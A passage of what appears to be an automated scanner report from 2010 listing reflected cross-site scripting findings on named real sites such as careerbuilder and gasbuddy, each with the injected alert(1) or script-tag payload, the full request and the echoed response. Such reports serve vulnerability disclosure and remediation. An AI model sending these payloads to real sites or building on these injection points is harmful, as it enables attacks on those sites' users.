CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.105. http://df.gasbuddy.com/feed.gbmap [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://df.gasbuddy.com
Path:   /feed.gbmap

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d2a'-alert(1)-'486dca9d5d was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 603

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true;head =
...[SNIP]...

2.106. http://df.gasbuddy.com/feed.gbmap [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://df.gasbuddy.com
Path:   /feed.gbmap

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1810'-alert(1)-'b9c2d2adc10 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834 HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 604

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true
...[SNIP]...

2.107. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://eltiempo.elnuevoherald.com
Path:   /US/FL/Miami.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd5e"><script>alert(1)</script>4fe0b2c4f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:26:23 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.181
Set-Cookie: ASC=1289773583:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c?map=IRSatellite&anim=0">
...[SNIP]...

2.108. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://eltiempo.elnuevoherald.com
Path:   /US/FL/Miami.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b46d"><script>alert(1)</script>4d14efa3e5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1 HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:25:56 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.285
Set-Cookie: ASC=1289773556:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1&map=IRSatellite&anim=0">
...[SNIP]...

2.109. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://engineering.careerbuilder.com
Path:   /en.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbee"%20a%3db%20312f0d1a369 was submitted in the lr parameter. This input was echoed as adbee" a=b 312f0d1a369 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en.ic/Florida_Miami/?lr=cbcb_mhadbee"%20a%3db%20312f0d1a369&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194088
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9a591372b45048d197c7450f2738d22c-343070827-RP-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650D89AFF5D24976CE7314F6F2F9565A4DD9C01C8ABDFDB17E60471E4011A7A49609332F6EA0B9FFBAC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:07 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 22:27:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhadbee" a=b 312f0d1a369" />
...[SNIP]...

2.110. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://engineering.careerbuilder.com
Path:   /en.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b493'-alert(1)-'1a957c281b6 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en.ic/Florida_Miami/?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194890
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9dc8162df01c4990b3256468ae53f08e-343070847-RS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65044DFD330AB56844A290AE2950B748B2AAA785234862F5A2BE9A14C55B142B8293BC3E047BD96D1BF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:27 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:27 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL28
Date: Sun, 14 Nov 2010 22:27:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.111. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://executive.careerbuilder.com
Path:   /ex.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3041b'-alert(1)-'6d3b4ce97bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ex.ic/Florida_Miami/?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&SiteID=cbcb_mh038 HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196142
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=e3a92f7a94bb4aefad32a22492f2f8ec-343070882-wj-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6503492847FF777B22F8576D0825F22D3B746B718754B54EA145BAD3B556B5A7EA8F7DE56AA62C5B566; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:02 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:02 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR20
Date: Sun, 14 Nov 2010 22:28:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.112. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://executive.careerbuilder.com
Path:   /ex.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 749c6"%20a%3db%20751bb406a83 was submitted in the lr parameter. This input was echoed as 749c6" a=b 751bb406a83 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ex.ic/Florida_Miami/?lr=cbcb_mh749c6"%20a%3db%20751bb406a83&SiteID=cbcb_mh038 HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195292
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=47aedb72ac304fa681c636fd69677a9d-343070852-XA-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500EA1D41B61C64B6248A474FC3460AF4AEC050CF26BFBC579150EA207841BA8141D97498AE19DB109; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:32 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:33 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 22:27:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh749c6" a=b 751bb406a83" />
...[SNIP]...

2.113. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://gov.careerbuilder.com
Path:   /gv.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd998"%20a%3db%20b05fa222a32 was submitted in the lr parameter. This input was echoed as cd998" a=b b05fa222a32 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gv.ic/Florida_Miami/?lr=cbcb_mhcd998"%20a%3db%20b05fa222a32&SiteID=cbcb_mh093 HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183263
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=ecdb0331cb464a329fd1c80ad18f7967-343070959-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650CC4B7FEBB57BA953BF422DB350B4E9BA73F80F19EB0362A5B01665D8C3627263610414ED49AA948E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:19 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:19 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:29:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhcd998" a=b b05fa222a32" />
...[SNIP]...

2.114. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gov.careerbuilder.com
Path:   /gv.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ef3'-alert(1)-'1222dc2a568 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gv.ic/Florida_Miami/?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&SiteID=cbcb_mh093 HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183635
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fe5cf099e2404089ab2ae0bf03c8cc69-343070985-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6504D3DF8B2F19A076E592FF6AA46ECF05B008D780A8FC101ADEA09DA48E869B6649FEEDA7F13873918; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:45 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:29:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.115. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://human-resources.careerbuilder.com
Path:   /hr.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a656a"%20a%3db%203feb96be110 was submitted in the lr parameter. This input was echoed as a656a" a=b 3feb96be110 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hr.ic/Florida_Miami/?lr=cbcb_mha656a"%20a%3db%203feb96be110&SiteID=cbcb_mh041 HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194193
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1e5701970477412aa75465747cf51d58-343070973-VK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650865DE06C3AE6A4BBB8F6A0661D0455222BAE02B5150F8E67A38F6CB311BAA009D670CCB1DAF5CA4A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:33 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:33 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 22:29:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mha656a" a=b 3feb96be110" />
...[SNIP]...

2.116. http://human-resources.careerbuilder.com/hr.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://human-resources.careerbuilder.com
Path:   /hr.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba05'-alert(1)-'20bdb4e6d83 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hr.ic/Florida_Miami/?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&SiteID=cbcb_mh041 HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194902
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=7bfbfd0022de40daa96f627df37564bf-343070993-RM-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6501E658FA81FEF0DB60921B25D8E4F2FE04403B3C7B2678EDE05E651406E1D89EA5E4984F4B9384687; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:53 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL22
Date: Sun, 14 Nov 2010 22:29:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.117. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://information-technology.careerbuilder.com
Path:   /it.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54914"%20a%3db%2095f3352e48e was submitted in the lr parameter. This input was echoed as 54914" a=b 95f3352e48e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /it.ic/Florida_Miami/?lr=cbcb_mh54914"%20a%3db%2095f3352e48e&SiteID=cbcb_mh042 HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190767
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1eebfb60fe96456d8a3b98a9516e4751-343070978-RB-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508E9F867635F13D3D0437D5790B86ED02ADDD09ED97BAA2FC74B7E92B73F8C7F44E1FFD0AA13E1555; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:38 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL11
Date: Sun, 14 Nov 2010 22:29:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh54914" a=b 95f3352e48e" />
...[SNIP]...

2.118. http://information-technology.careerbuilder.com/it.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://information-technology.careerbuilder.com
Path:   /it.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fd5'-alert(1)-'67f3434df66 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it.ic/Florida_Miami/?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&SiteID=cbcb_mh042 HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

